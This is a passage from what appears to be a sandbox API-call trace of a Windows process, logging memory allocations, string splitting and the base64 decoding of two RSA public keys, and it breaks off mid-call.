_Val=10, _MaxCount=0xf2) returned 0x36938a7 [0155.253] malloc (_Size=0x11) returned 0x3f653e0 [0155.253] free (_Block=0x0) [0155.253] free (_Block=0x0) [0155.253] memchr (_Buf=0x36938a8, _Val=10, _MaxCount=0xe1) returned 0x36938c1 [0155.253] malloc (_Size=0x1a) returned 0x3d80260 [0155.253] free (_Block=0x0) [0155.253] free (_Block=0x0) [0155.253] memchr (_Buf=0x36938c2, _Val=10, _MaxCount=0xc7) returned 0x3693902 [0155.253] malloc (_Size=0x41) returned 0x60e788 [0155.253] free (_Block=0x0) [0155.253] free (_Block=0x0) [0155.253] memchr (_Buf=0x3693903, _Val=10, _MaxCount=0x86) returned 0x3693943 [0155.253] malloc (_Size=0x41) returned 0x60e918 [0155.253] free (_Block=0x0) [0155.254] free (_Block=0x0) [0155.254] memchr (_Buf=0x3693944, _Val=10, _MaxCount=0x45) returned 0x3693970 [0155.254] malloc (_Size=0x2d) returned 0x3624b10 [0155.254] free (_Block=0x0) [0155.254] free (_Block=0x0) [0155.254] memchr (_Buf=0x3693971, _Val=10, _MaxCount=0x18) returned 0x3693988 [0155.254] malloc (_Size=0x18) returned 0x3f654a0 [0155.254] free (_Block=0x0) [0155.254] free (_Block=0x0) [0155.254] free (_Block=0x36929c0) [0155.254] memchr (_Buf=0x60dd68, _Val=32, _MaxCount=0x24) returned 0x60dd6e [0155.254] malloc (_Size=0x7) returned 0x3f4bfe8 [0155.254] free (_Block=0x0) [0155.254] malloc (_Size=0x40) returned 0x3e226f8 [0155.254] free (_Block=0x0) [0155.254] free (_Block=0x0) [0155.254] memchr (_Buf=0x60dd6f, _Val=32, _MaxCount=0x1d) returned 0x60dd75 [0155.254] malloc (_Size=0x7) returned 0x3f4c048 [0155.254] free (_Block=0x0) [0155.255] free (_Block=0x0) [0155.255] memchr (_Buf=0x60dd76, _Val=32, _MaxCount=0x16) returned 0x60dd83 [0155.255] malloc (_Size=0xe) returned 0x3648c98 [0155.255] free (_Block=0x0) [0155.255] free (_Block=0x0) [0155.255] memchr (_Buf=0x60dd84, _Val=32, _MaxCount=0x8) returned 0x60dd87 [0155.255] malloc (_Size=0x4) returned 0x3f4c038 [0155.255] free (_Block=0x0) [0155.255] free (_Block=0x0) [0155.255] memchr (_Buf=0x60dd88, _Val=32, _MaxCount=0x4) returned 0x60dd89 [0155.255] malloc (_Size=0x2) returned 0x3f4c028 [0155.255] free (_Block=0x0) [0155.255] malloc (_Size=0x140) returned 0x3dd3d50 [0155.255] free (_Block=0x3e226f8) [0155.255] free (_Block=0x0) [0155.255] memchr (_Buf=0x60dd8a, _Val=32, _MaxCount=0x2) returned 0x0 [0155.255] malloc (_Size=0x3) returned 0x3f4c058 [0155.255] free (_Block=0x0) [0155.256] free (_Block=0x0) [0155.256] free (_Block=0x3f4bfe8) [0155.256] free (_Block=0x3f4c048) [0155.256] free (_Block=0x3648c98) [0155.256] free (_Block=0x3f4c038) [0155.256] free (_Block=0x3f4c028) [0155.256] free (_Block=0x3f4c058) [0155.256] free (_Block=0x3dd3d50) [0155.256] memchr (_Buf=0x3f65440, _Val=32, _MaxCount=0x10) returned 0x0 [0155.256] malloc (_Size=0x11) returned 0x3f654e0 [0155.256] free (_Block=0x0) [0155.256] malloc (_Size=0x40) returned 0x3e22110 [0155.256] free (_Block=0x0) [0155.256] free (_Block=0x0) [0155.256] free (_Block=0x3f654e0) [0155.256] free (_Block=0x3e22110) [0155.256] memchr (_Buf=0x3d803c8, _Val=32, _MaxCount=0x1c) returned 0x3d803d2 [0155.256] malloc (_Size=0xb) returned 0x3648da0 [0155.256] free (_Block=0x0) [0155.257] malloc (_Size=0x40) returned 0x3e221a0 [0155.257] free (_Block=0x0) [0155.257] free (_Block=0x0) [0155.257] memchr (_Buf=0x3d803d3, _Val=32, _MaxCount=0x11) returned 0x3d803da [0155.257] malloc (_Size=0x8) returned 0x3f4c018 [0155.257] free (_Block=0x0) [0155.257] free (_Block=0x0) [0155.257] memchr (_Buf=0x3d803db, _Val=32, _MaxCount=0x9) returned 0x0 [0155.257] malloc (_Size=0xa) returned 0x3648d58 [0155.257] free (_Block=0x0) [0155.257] free (_Block=0x0) [0155.257] free (_Block=0x3648da0) [0155.257] free (_Block=0x3f4c018) [0155.257] free (_Block=0x3648d58) [0155.257] free (_Block=0x3e221a0) [0155.257] memchr (_Buf=0x60edc8, _Val=32, _MaxCount=0x40) returned 0x0 [0155.257] malloc (_Size=0x41) returned 0x60e6e8 [0155.257] free (_Block=0x0) [0155.258] malloc (_Size=0x40) returned 0x3e22500 [0155.258] free (_Block=0x0) [0155.258] free (_Block=0x0) [0155.258] free (_Block=0x60e6e8) [0155.258] free (_Block=0x3e22500) [0155.258] memchr (_Buf=0x60ee18, _Val=32, _MaxCount=0x40) returned 0x0 [0155.258] malloc (_Size=0x41) returned 0x60e738 [0155.258] free (_Block=0x0) [0155.258] malloc (_Size=0x40) returned 0x3e22668 [0155.258] free (_Block=0x0) [0155.258] free (_Block=0x0) [0155.258] free (_Block=0x60e738) [0155.258] free (_Block=0x3e22668) [0155.258] memchr (_Buf=0x3e226b0, _Val=32, _MaxCount=0x3c) returned 0x0 [0155.258] malloc (_Size=0x3d) returned 0x3e22620 [0155.259] free (_Block=0x0) [0155.259] malloc (_Size=0x40) returned 0x3e224b8 [0155.259] free (_Block=0x0) [0155.259] free (_Block=0x0) [0155.259] free (_Block=0x3e22620) [0155.259] free (_Block=0x3e224b8) [0155.259] memchr (_Buf=0x3d80120, _Val=32, _MaxCount=0x1a) returned 0x3d80128 [0155.259] malloc (_Size=0x9) returned 0x3648e60 [0155.259] free (_Block=0x0) [0155.259] malloc (_Size=0x40) returned 0x3e22788 [0155.259] free (_Block=0x0) [0155.259] free (_Block=0x0) [0155.259] memchr (_Buf=0x3d80129, _Val=32, _MaxCount=0x11) returned 0x3d80130 [0155.259] malloc (_Size=0x8) returned 0x3f4bfb8 [0155.259] free (_Block=0x0) [0155.259] free (_Block=0x0) [0155.259] memchr (_Buf=0x3d80131, _Val=32, _MaxCount=0x9) returned 0x0 [0155.259] malloc (_Size=0xa) returned 0x3648f20 [0155.259] free (_Block=0x0) [0155.260] free (_Block=0x0) [0155.260] free (_Block=0x3648e60) [0155.260] free (_Block=0x3f4bfb8) [0155.260] free (_Block=0x3648f20) [0155.260] free (_Block=0x3e22788) [0155.260] memchr (_Buf=0x3e22470, _Val=32, _MaxCount=0x3e) returned 0x3e22482 [0155.260] malloc (_Size=0x13) returned 0x3f654c0 [0155.260] free (_Block=0x0) [0155.260] malloc (_Size=0x40) returned 0x3e22158 [0155.260] free (_Block=0x0) [0155.260] free (_Block=0x0) [0155.260] memchr (_Buf=0x3e22483, _Val=32, _MaxCount=0x2b) returned 0x0 [0155.260] malloc (_Size=0x2c) returned 0x3624a30 [0155.260] free (_Block=0x0) [0155.260] free (_Block=0x0) [0155.260] free (_Block=0x3f654c0) [0155.260] free (_Block=0x3624a30) [0155.260] free (_Block=0x3e22158) [0155.260] memchr (_Buf=0x3d80080, _Val=32, _MaxCount=0x1e) returned 0x3d8008a [0155.260] malloc (_Size=0xb) returned 0x3648e90 [0155.260] free (_Block=0x0) [0155.260] malloc (_Size=0x40) returned 0x3e226f8 [0155.261] free (_Block=0x0) [0155.261] free (_Block=0x0) [0155.261] memchr (_Buf=0x3d8008b, _Val=32, _MaxCount=0x13) returned 0x0 [0155.261] malloc (_Size=0x14) returned 0x3f654c0 [0155.261] free (_Block=0x0) [0155.261] free (_Block=0x0) [0155.261] free (_Block=0x3648e90) [0155.261] free (_Block=0x3f654c0) [0155.261] free (_Block=0x3e226f8) [0155.261] memchr (_Buf=0x3d802b0, _Val=32, _MaxCount=0x1f) returned 0x3d802b8 [0155.261] malloc (_Size=0x9) returned 0x3648e60 [0155.261] free (_Block=0x0) [0155.261] malloc (_Size=0x40) returned 0x3e227d0 [0155.261] free (_Block=0x0) [0155.261] free (_Block=0x0) [0155.261] memchr (_Buf=0x3d802b9, _Val=32, _MaxCount=0x16) returned 0x3d802bc [0155.261] malloc (_Size=0x4) returned 0x3f4bfc8 [0155.261] free (_Block=0x0) [0155.261] free (_Block=0x0) [0155.261] memchr (_Buf=0x3d802bd, _Val=32, _MaxCount=0x12) returned 0x3d802c4 [0155.261] malloc (_Size=0x8) returned 0x3f4bf38 [0155.261] free (_Block=0x0) [0155.262] free (_Block=0x0) [0155.262] memchr (_Buf=0x3d802c5, _Val=32, _MaxCount=0xa) returned 0x3d802c7 [0155.262] malloc (_Size=0x3) returned 0x3f4bfd8 [0155.262] free (_Block=0x0) [0155.262] free (_Block=0x0) [0155.262] memchr (_Buf=0x3d802c8, _Val=32, _MaxCount=0x7) returned 0x0 [0155.262] malloc (_Size=0x8) returned 0x3f4c098 [0155.262] free (_Block=0x0) [0155.262] malloc (_Size=0x140) returned 0x3dd3c08 [0155.262] free (_Block=0x3e227d0) [0155.262] free (_Block=0x0) [0155.262] free (_Block=0x3648e60) [0155.262] free (_Block=0x3f4bfc8) [0155.262] free (_Block=0x3f4bf38) [0155.262] free (_Block=0x3f4bfd8) [0155.262] free (_Block=0x3f4c098) [0155.262] free (_Block=0x3dd3c08) [0155.262] memchr (_Buf=0x6066d8, _Val=32, _MaxCount=0x88) returned 0x6066dd [0155.262] malloc (_Size=0x6) returned 0x3f4c028 [0155.262] free (_Block=0x0) [0155.262] malloc (_Size=0x40) returned 0x3e225d8 [0155.262] free (_Block=0x0) [0155.262] free (_Block=0x0) [0155.262] memchr (_Buf=0x6066de, _Val=32, _MaxCount=0x82) returned 0x6066e6 [0155.262] malloc (_Size=0x9) returned 0x3648e60 [0155.263] free (_Block=0x0) [0155.263] free (_Block=0x0) [0155.263] memchr (_Buf=0x6066e7, _Val=32, _MaxCount=0x79) returned 0x6066ef [0155.263] malloc (_Size=0x9) returned 0x3648d58 [0155.263] free (_Block=0x0) [0155.263] free (_Block=0x0) [0155.263] memchr (_Buf=0x6066f0, _Val=32, _MaxCount=0x70) returned 0x6066fc [0155.263] malloc (_Size=0xd) returned 0x3648e18 [0155.263] free (_Block=0x0) [0155.263] free (_Block=0x0) [0155.263] memchr (_Buf=0x6066fd, _Val=32, _MaxCount=0x63) returned 0x606706 [0155.263] malloc (_Size=0xa) returned 0x3648db8 [0155.263] free (_Block=0x0) [0155.263] malloc (_Size=0x140) returned 0x3dd4a20 [0155.263] free (_Block=0x3e225d8) [0155.263] free (_Block=0x0) [0155.263] memchr (_Buf=0x606707, _Val=32, _MaxCount=0x59) returned 0x606712 [0155.264] malloc (_Size=0xc) returned 0x3648c50 [0155.264] free (_Block=0x0) [0155.264] free (_Block=0x0) [0155.264] memchr (_Buf=0x606713, _Val=32, _MaxCount=0x4d) returned 0x60671d [0155.264] malloc (_Size=0xb) returned 0x3648d70 [0155.264] free (_Block=0x0) [0155.264] free (_Block=0x0) [0155.264] memchr (_Buf=0x60671e, _Val=32, _MaxCount=0x42) returned 0x606726 [0155.264] malloc (_Size=0x9) returned 0x3648e78 [0155.264] free (_Block=0x0) [0155.264] free (_Block=0x0) [0155.264] memchr (_Buf=0x606727, _Val=32, _MaxCount=0x39) returned 0x606733 [0155.264] malloc (_Size=0xd) returned 0x3648ce0 [0155.264] free (_Block=0x0) [0155.264] free (_Block=0x0) [0155.264] memchr (_Buf=0x606734, _Val=32, _MaxCount=0x2c) returned 0x606741 [0155.264] malloc (_Size=0xe) returned 0x3648d10 [0155.264] free (_Block=0x0) [0155.264] free (_Block=0x0) [0155.264] memchr (_Buf=0x606742, _Val=32, _MaxCount=0x1e) returned 0x60674b [0155.264] malloc (_Size=0xa) returned 0x3648cf8 [0155.264] free (_Block=0x0) [0155.265] free (_Block=0x0) [0155.265] memchr (_Buf=0x60674c, _Val=32, _MaxCount=0x14) returned 0x606755 [0155.265] malloc (_Size=0xa) returned 0x3648c98 [0155.265] free (_Block=0x0) [0155.265] free (_Block=0x0) [0155.265] memchr (_Buf=0x606756, _Val=32, _MaxCount=0xa) returned 0x0 [0155.265] malloc (_Size=0xb) returned 0x3648dd0 [0155.265] free (_Block=0x0) [0155.266] free (_Block=0x0) [0155.266] free (_Block=0x3f4c028) [0155.266] free (_Block=0x3648e60) [0155.266] free (_Block=0x3648d58) [0155.266] free (_Block=0x3648e18) [0155.266] free (_Block=0x3648db8) [0155.266] free (_Block=0x3648c50) [0155.266] free (_Block=0x3648d70) [0155.266] free (_Block=0x3648e78) [0155.266] free (_Block=0x3648ce0) [0155.266] free (_Block=0x3648d10) [0155.266] free (_Block=0x3648cf8) [0155.266] free (_Block=0x3648c98) [0155.266] free (_Block=0x3648dd0) [0155.266] free (_Block=0x3dd4a20) [0155.266] memchr (_Buf=0x3d80350, _Val=32, _MaxCount=0x1d) returned 0x3d80359 [0155.266] malloc (_Size=0xa) returned 0x3648db8 [0155.266] free (_Block=0x0) [0155.266] malloc (_Size=0x40) returned 0x3e22398 [0155.266] free (_Block=0x0) [0155.266] free (_Block=0x0) [0155.266] memchr (_Buf=0x3d8035a, _Val=32, _MaxCount=0x13) returned 0x3d80364 [0155.266] malloc (_Size=0xb) returned 0x3648f20 [0155.266] free (_Block=0x0) [0155.266] free (_Block=0x0) [0155.266] memchr (_Buf=0x3d80365, _Val=32, _MaxCount=0x8) returned 0x0 [0155.267] malloc (_Size=0x9) returned 0x3648ea8 [0155.267] free (_Block=0x0) [0155.267] free (_Block=0x0) [0155.267] free (_Block=0x3648db8) [0155.267] free (_Block=0x3648f20) [0155.267] free (_Block=0x3648ea8) [0155.267] free (_Block=0x3e22398) [0155.267] memchr (_Buf=0x3e223e0, _Val=32, _MaxCount=0x3d) returned 0x3e223eb [0155.267] malloc (_Size=0xc) returned 0x3648f20 [0155.267] free (_Block=0x0) [0155.267] malloc (_Size=0x40) returned 0x3e22428 [0155.267] free (_Block=0x0) [0155.267] free (_Block=0x0) [0155.267] memchr (_Buf=0x3e223ec, _Val=32, _MaxCount=0x31) returned 0x3e223f0 [0155.267] malloc (_Size=0x5) returned 0x3f4c0f8 [0155.267] free (_Block=0x0) [0155.267] free (_Block=0x0) [0155.267] memchr (_Buf=0x3e223f1, _Val=32, _MaxCount=0x2c) returned 0x3e223f5 [0155.267] malloc (_Size=0x5) returned 0x3f4bf18 [0155.267] free (_Block=0x0) [0155.267] free (_Block=0x0) [0155.267] memchr (_Buf=0x3e223f6, _Val=32, _MaxCount=0x27) returned 0x3e223fa [0155.267] malloc (_Size=0x5) returned 0x3f4bfb8 [0155.268] free (_Block=0x0) [0155.268] free (_Block=0x0) [0155.268] memchr (_Buf=0x3e223fb, _Val=32, _MaxCount=0x22) returned 0x3e223ff [0155.268] malloc (_Size=0x5) returned 0x3f4bf28 [0155.268] free (_Block=0x0) [0155.268] malloc (_Size=0x140) returned 0x3dd48d8 [0155.268] free (_Block=0x3e22428) [0155.268] free (_Block=0x0) [0155.268] memchr (_Buf=0x3e22400, _Val=32, _MaxCount=0x1d) returned 0x3e22404 [0155.268] malloc (_Size=0x5) returned 0x3f4c038 [0155.268] free (_Block=0x0) [0155.268] free (_Block=0x0) [0155.268] memchr (_Buf=0x3e22405, _Val=32, _MaxCount=0x18) returned 0x3e22409 [0155.268] malloc (_Size=0x5) returned 0x3f4c028 [0155.268] free (_Block=0x0) [0155.268] free (_Block=0x0) [0155.268] memchr (_Buf=0x3e2240a, _Val=32, _MaxCount=0x13) returned 0x3e2240e [0155.268] malloc (_Size=0x5) returned 0x3f4c098 [0155.268] free (_Block=0x0) [0155.269] free (_Block=0x0) [0155.269] memchr (_Buf=0x3e2240f, _Val=32, _MaxCount=0xe) returned 0x3e22413 [0155.269] malloc (_Size=0x5) returned 0x3f4bf68 [0155.269] free (_Block=0x0) [0155.269] free (_Block=0x0) [0155.269] memchr (_Buf=0x3e22414, _Val=32, _MaxCount=0x9) returned 0x3e22418 [0155.269] malloc (_Size=0x5) returned 0x3f4c088 [0155.269] free (_Block=0x0) [0155.269] free (_Block=0x0) [0155.269] memchr (_Buf=0x3e22419, _Val=32, _MaxCount=0x4) returned 0x0 [0155.269] malloc (_Size=0x5) returned 0x3f4bfc8 [0155.269] free (_Block=0x0) [0155.269] free (_Block=0x0) [0155.269] free (_Block=0x3648f20) [0155.269] free (_Block=0x3f4c0f8) [0155.269] free (_Block=0x3f4bf18) [0155.269] free (_Block=0x3f4bfb8) [0155.269] free (_Block=0x3f4bf28) [0155.269] free (_Block=0x3f4c038) [0155.269] free (_Block=0x3f4c028) [0155.269] free (_Block=0x3f4c098) [0155.270] free (_Block=0x3f4bf68) [0155.270] free (_Block=0x3f4c088) [0155.270] free (_Block=0x3f4bfc8) [0155.270] free (_Block=0x3dd48d8) [0155.270] memchr (_Buf=0x3648e30, _Val=32, _MaxCount=0xe) returned 0x3648e36 [0155.270] malloc (_Size=0x7) returned 0x3f4bf28 [0155.270] free (_Block=0x0) [0155.270] malloc (_Size=0x40) returned 0x3e22740 [0155.270] free (_Block=0x0) [0155.270] free (_Block=0x0) [0155.270] memchr (_Buf=0x3648e37, _Val=32, _MaxCount=0x7) returned 0x0 [0155.270] malloc (_Size=0x8) returned 0x3f4bf88 [0155.270] free (_Block=0x0) [0155.270] free (_Block=0x0) [0155.270] free (_Block=0x3f4bf28) [0155.270] free (_Block=0x3f4bf88) [0155.270] free (_Block=0x3e22740) [0155.270] memchr (_Buf=0x60ddf8, _Val=32, _MaxCount=0x27) returned 0x60de01 [0155.270] malloc (_Size=0xa) returned 0x3648e60 [0155.270] free (_Block=0x0) [0155.270] malloc (_Size=0x40) returned 0x3e22038 [0155.270] free (_Block=0x0) [0155.270] free (_Block=0x0) [0155.270] memchr (_Buf=0x60de02, _Val=32, _MaxCount=0x1d) returned 0x60de0c [0155.270] malloc (_Size=0xb) returned 0x3648d58 [0155.271] free (_Block=0x0) [0155.271] free (_Block=0x0) [0155.271] memchr (_Buf=0x60de0d, _Val=32, _MaxCount=0x12) returned 0x60de17 [0155.271] malloc (_Size=0xb) returned 0x3648e78 [0155.271] free (_Block=0x0) [0155.271] free (_Block=0x0) [0155.271] memchr (_Buf=0x60de18, _Val=32, _MaxCount=0x7) returned 0x0 [0155.271] malloc (_Size=0x8) returned 0x3f4c038 [0155.271] free (_Block=0x0) [0155.271] free (_Block=0x0) [0155.271] free (_Block=0x3648e60) [0155.271] free (_Block=0x3648d58) [0155.271] free (_Block=0x3648e78) [0155.271] free (_Block=0x3f4c038) [0155.271] free (_Block=0x3e22038) [0155.271] memchr (_Buf=0x60b380, _Val=32, _MaxCount=0x66) returned 0x60b391 [0155.271] malloc (_Size=0x12) returned 0x3f654c0 [0155.271] free (_Block=0x0) [0155.271] malloc (_Size=0x40) returned 0x3e224b8 [0155.271] free (_Block=0x0) [0155.271] free (_Block=0x0) [0155.271] memchr (_Buf=0x60b392, _Val=32, _MaxCount=0x54) returned 0x60b3ba [0155.271] malloc (_Size=0x29) returned 0x36249c0 [0155.272] free (_Block=0x0) [0155.272] free (_Block=0x0) [0155.272] memchr (_Buf=0x60b3bb, _Val=32, _MaxCount=0x2b) returned 0x0 [0155.272] malloc (_Size=0x2c) returned 0x3624bb8 [0155.272] free (_Block=0x0) [0155.272] free (_Block=0x0) [0155.272] free (_Block=0x3f654c0) [0155.272] free (_Block=0x36249c0) [0155.272] free (_Block=0x3624bb8) [0155.272] free (_Block=0x3e224b8) [0155.272] memchr (_Buf=0x3648c68, _Val=32, _MaxCount=0x9) returned 0x0 [0155.272] malloc (_Size=0xa) returned 0x3648e78 [0155.272] free (_Block=0x0) [0155.273] malloc (_Size=0x40) returned 0x3e221e8 [0155.273] free (_Block=0x0) [0155.273] free (_Block=0x0) [0155.273] free (_Block=0x3648e78) [0155.273] free (_Block=0x3e221e8) [0155.273] memchr (_Buf=0x3d801e8, _Val=32, _MaxCount=0x1e) returned 0x3d801f2 [0155.273] malloc (_Size=0xb) returned 0x3648e00 [0155.273] free (_Block=0x0) [0155.273] malloc (_Size=0x40) returned 0x3e22740 [0155.273] free (_Block=0x0) [0155.273] free (_Block=0x0) [0155.273] memchr (_Buf=0x3d801f3, _Val=32, _MaxCount=0x13) returned 0x3d801f6 [0155.273] malloc (_Size=0x4) returned 0x3f4c008 [0155.273] free (_Block=0x0) [0155.273] free (_Block=0x0) [0155.273] memchr (_Buf=0x3d801f7, _Val=32, _MaxCount=0xf) returned 0x3d801fd [0155.273] malloc (_Size=0x7) returned 0x3f4c038 [0155.273] free (_Block=0x0) [0155.273] free (_Block=0x0) [0155.273] memchr (_Buf=0x3d801fe, _Val=32, _MaxCount=0x8) returned 0x0 [0155.273] malloc (_Size=0x9) returned 0x3648de8 [0155.273] free (_Block=0x0) [0155.273] free (_Block=0x0) [0155.274] free (_Block=0x3648e00) [0155.274] free (_Block=0x3f4c008) [0155.274] free (_Block=0x3f4c038) [0155.274] free (_Block=0x3648de8) [0155.274] free (_Block=0x3e22740) [0155.274] memchr (_Buf=0x60ebe8, _Val=32, _MaxCount=0x40) returned 0x0 [0155.274] malloc (_Size=0x41) returned 0x60e828 [0155.274] free (_Block=0x0) [0155.274] malloc (_Size=0x40) returned 0x3e224b8 [0155.274] free (_Block=0x0) [0155.274] free (_Block=0x0) [0155.274] malloc (_Size=0x41) returned 0x60e8c8 [0155.274] free (_Block=0x0) [0155.274] free (_Block=0x60e828) [0155.274] free (_Block=0x3e224b8) [0155.274] memchr (_Buf=0x60ec38, _Val=32, _MaxCount=0x40) returned 0x0 [0155.274] malloc (_Size=0x41) returned 0x60ea08 [0155.274] free (_Block=0x0) [0155.274] malloc (_Size=0x40) returned 0x3e22590 [0155.274] free (_Block=0x0) [0155.274] free (_Block=0x0) [0155.274] malloc (_Size=0x81) returned 0x60c410 [0155.275] free (_Block=0x60e8c8) [0155.275] free (_Block=0x60ea08) [0155.275] free (_Block=0x3e22590) [0155.275] memchr (_Buf=0x3e22080, _Val=32, _MaxCount=0x3c) returned 0x0 [0155.275] malloc (_Size=0x3d) returned 0x3e226f8 [0155.275] free (_Block=0x0) [0155.275] malloc (_Size=0x40) returned 0x3e22740 [0155.275] free (_Block=0x0) [0155.275] free (_Block=0x0) [0155.275] malloc (_Size=0xc1) returned 0x36926e0 [0155.275] free (_Block=0x60c410) [0155.275] free (_Block=0x3e226f8) [0155.275] free (_Block=0x3e22740) [0155.275] memchr (_Buf=0x3d80238, _Val=32, _MaxCount=0x1c) returned 0x3d80240 [0155.275] malloc (_Size=0x9) returned 0x3648c50 [0155.275] free (_Block=0x0) [0155.275] malloc (_Size=0x40) returned 0x3e22428 [0155.275] free (_Block=0x0) [0155.275] free (_Block=0x0) [0155.275] memchr (_Buf=0x3d80241, _Val=32, _MaxCount=0x13) returned 0x3d80244 [0155.275] malloc (_Size=0x4) returned 0x3f4bfc8 [0155.275] free (_Block=0x0) [0155.276] free (_Block=0x0) [0155.276] memchr (_Buf=0x3d80245, _Val=32, _MaxCount=0xf) returned 0x3d8024b [0155.276] malloc (_Size=0x7) returned 0x3f4bf58 [0155.276] free (_Block=0x0) [0155.276] free (_Block=0x0) [0155.276] memchr (_Buf=0x3d8024c, _Val=32, _MaxCount=0x8) returned 0x0 [0155.276] malloc (_Size=0x9) returned 0x3648d88 [0155.276] free (_Block=0x0) [0155.276] free (_Block=0x0) [0155.276] CryptStringToBinaryA (in: pszString="MIGJAoGBAOe7NVQg0ANmz36LlNh0lMeTFerKCKI7CF7ZlDHcGCuxlZyL+KbZiqbTBzNs58Rf8u99rCLWP4A7vDPiuhlUCtwj7pebI1Zu4DbHGM7NWRaIG7v7f1Hr/cWs6Lrjn//Nbs97YYe3AK/1nqzvTLsfg0/bmMryB6AsmJh3mqstnF6nAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.276] malloc (_Size=0x8c) returned 0x3594f20 [0155.276] free (_Block=0x0) [0155.276] CryptStringToBinaryA (in: pszString="MIGJAoGBAOe7NVQg0ANmz36LlNh0lMeTFerKCKI7CF7ZlDHcGCuxlZyL+KbZiqbTBzNs58Rf8u99rCLWP4A7vDPiuhlUCtwj7pebI1Zu4DbHGM7NWRaIG7v7f1Hr/cWs6Lrjn//Nbs97YYe3AK/1nqzvTLsfg0/bmMryB6AsmJh3mqstnF6nAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3594f20, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3594f20, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.276] malloc (_Size=0x8c) returned 0x605a18 [0155.276] free (_Block=0x0) [0155.276] free (_Block=0x0) [0155.276] free (_Block=0x3594f20) [0155.277] free (_Block=0x3648c50) [0155.277] free (_Block=0x3f4bfc8) [0155.277] free (_Block=0x3f4bf58) [0155.277] free (_Block=0x3648d88) [0155.277] free (_Block=0x3e22428) [0155.277] memchr (_Buf=0x3648ef0, _Val=32, _MaxCount=0xb) returned 0x0 [0155.277] malloc (_Size=0xc) returned 0x3648e00 [0155.277] free (_Block=0x0) [0155.277] malloc (_Size=0x40) returned 0x3e22110 [0155.277] free (_Block=0x0) [0155.277] free (_Block=0x0) [0155.277] free (_Block=0x3648e00) [0155.277] free (_Block=0x3e22110) [0155.277] memchr (_Buf=0x3d80198, _Val=32, _MaxCount=0x1e) returned 0x3d801a2 [0155.277] malloc (_Size=0xb) returned 0x3648ec0 [0155.277] free (_Block=0x0) [0155.277] malloc (_Size=0x40) returned 0x3e226f8 [0155.277] free (_Block=0x0) [0155.277] free (_Block=0x0) [0155.277] memchr (_Buf=0x3d801a3, _Val=32, _MaxCount=0x13) returned 0x3d801a6 [0155.277] malloc (_Size=0x4) returned 0x3f4bf98 [0155.278] free (_Block=0x0) [0155.278] free (_Block=0x0) [0155.278] memchr (_Buf=0x3d801a7, _Val=32, _MaxCount=0xf) returned 0x3d801ad [0155.278] malloc (_Size=0x7) returned 0x3f4bf88 [0155.278] free (_Block=0x0) [0155.278] free (_Block=0x0) [0155.278] memchr (_Buf=0x3d801ae, _Val=32, _MaxCount=0x8) returned 0x0 [0155.278] malloc (_Size=0x9) returned 0x3648ed8 [0155.278] free (_Block=0x0) [0155.278] free (_Block=0x0) [0155.278] free (_Block=0x3648ec0) [0155.278] free (_Block=0x3f4bf98) [0155.278] free (_Block=0x3f4bf88) [0155.278] free (_Block=0x3648ed8) [0155.278] free (_Block=0x3e226f8) [0155.278] memchr (_Buf=0x60eb98, _Val=32, _MaxCount=0x40) returned 0x0 [0155.278] malloc (_Size=0x41) returned 0x60e8c8 [0155.278] free (_Block=0x0) [0155.278] malloc (_Size=0x40) returned 0x3e22278 [0155.279] free (_Block=0x0) [0155.279] free (_Block=0x0) [0155.279] free (_Block=0x60e8c8) [0155.279] free (_Block=0x3e22278) [0155.279] memchr (_Buf=0x60e968, _Val=32, _MaxCount=0x40) returned 0x0 [0155.279] malloc (_Size=0x41) returned 0x60ea08 [0155.279] free (_Block=0x0) [0155.279] malloc (_Size=0x40) returned 0x3e22038 [0155.279] free (_Block=0x0) [0155.279] free (_Block=0x0) [0155.279] free (_Block=0x60ea08) [0155.279] free (_Block=0x3e22038) [0155.279] memchr (_Buf=0x3e22230, _Val=32, _MaxCount=0x3c) returned 0x0 [0155.279] malloc (_Size=0x3d) returned 0x3e22428 [0155.280] free (_Block=0x0) [0155.280] malloc (_Size=0x40) returned 0x3e224b8 [0155.280] free (_Block=0x0) [0155.280] free (_Block=0x0) [0155.280] free (_Block=0x3e22428) [0155.280] free (_Block=0x3e224b8) [0155.280] memchr (_Buf=0x3d800d0, _Val=32, _MaxCount=0x1c) returned 0x3d800d8 [0155.280] malloc (_Size=0x9) returned 0x3648f20 [0155.280] free (_Block=0x0) [0155.280] malloc (_Size=0x40) returned 0x3e22428 [0155.280] free (_Block=0x0) [0155.280] free (_Block=0x0) [0155.280] memchr (_Buf=0x3d800d9, _Val=32, _MaxCount=0x13) returned 0x3d800dc [0155.280] malloc (_Size=0x4) returned 0x3f4bfe8 [0155.280] free (_Block=0x0) [0155.280] free (_Block=0x0) [0155.280] memchr (_Buf=0x3d800dd, _Val=32, _MaxCount=0xf) returned 0x3d800e3 [0155.280] malloc (_Size=0x7) returned 0x3f4bf58 [0155.280] free (_Block=0x0) [0155.280] free (_Block=0x0) [0155.280] memchr (_Buf=0x3d800e4, _Val=32, _MaxCount=0x8) returned 0x0 [0155.280] malloc (_Size=0x9) returned 0x3648e78 [0155.281] free (_Block=0x0) [0155.281] free (_Block=0x0) [0155.281] CryptStringToBinaryA (in: pszString="MIGJAoGBALO/a/YfqxtJA1i5YTi7W6HzPZLLs577DnmP8o2rnKfekKXw0L5hbMutqb689YBj485q+L7ZG0KdZvT5i5K9nnxlNysh81xllLt4BdDbMxAu7/DsM1Y5WvR0X7cXkDLtNjjsPo6YkaYM8oqY3jMhSr9N930M1O1lKLaW22+neCpXAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.281] malloc (_Size=0x8c) returned 0x3594f20 [0155.281] free (_Block=0x0) [0155.281] CryptStringToBinaryA (in: pszString="MIGJAoGBALO/a/YfqxtJA1i5YTi7W6HzPZLLs577DnmP8o2rnKfekKXw0L5hbMutqb689YBj485q+L7ZG0KdZvT5i5K9nnxlNysh81xllLt4BdDbMxAu7/DsM1Y5WvR0X7cXkDLtNjjsPo6YkaYM8oqY3jMhSr9N930M1O1lKLaW22+neCpXAgMBAAE=", 